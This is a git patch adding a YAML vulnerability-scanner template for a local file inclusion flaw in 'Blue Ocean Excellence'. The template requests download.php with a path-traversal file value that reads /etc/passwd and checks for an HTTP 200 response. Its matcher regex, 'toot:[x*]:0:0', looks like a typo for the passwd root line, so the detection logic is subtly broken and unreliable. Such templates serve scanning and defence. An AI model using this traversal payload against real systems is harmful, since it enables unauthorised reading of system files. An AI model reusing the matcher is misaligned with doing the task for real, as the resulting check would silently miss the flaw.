From f944191e7a9d5eeeec0a4dbe32652072e6943623 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 09:29:51 +0000 Subject: [PATCH] Create blue-ocean-excellence-lfi.yaml --- .../other/blue-ocean-excellence-lfi.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/other/blue-ocean-excellence-lfi.yaml diff --git a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml new file mode 100644 index 0000000000..cb2c86fa77 --- /dev/null +++ b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml @@ -0,0 +1,24 @@ +id: blue-ocean-excellence-lfi + +info: + name: Blue Ocean Excellence LFI + author: pikpikcu + severity: medium + reference: https://blog.csdn.net/qq_41901122/article/details/116786883 + tags: blue-ocean,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "toot:[x*]:0:0" + + - type: status + status: + - 200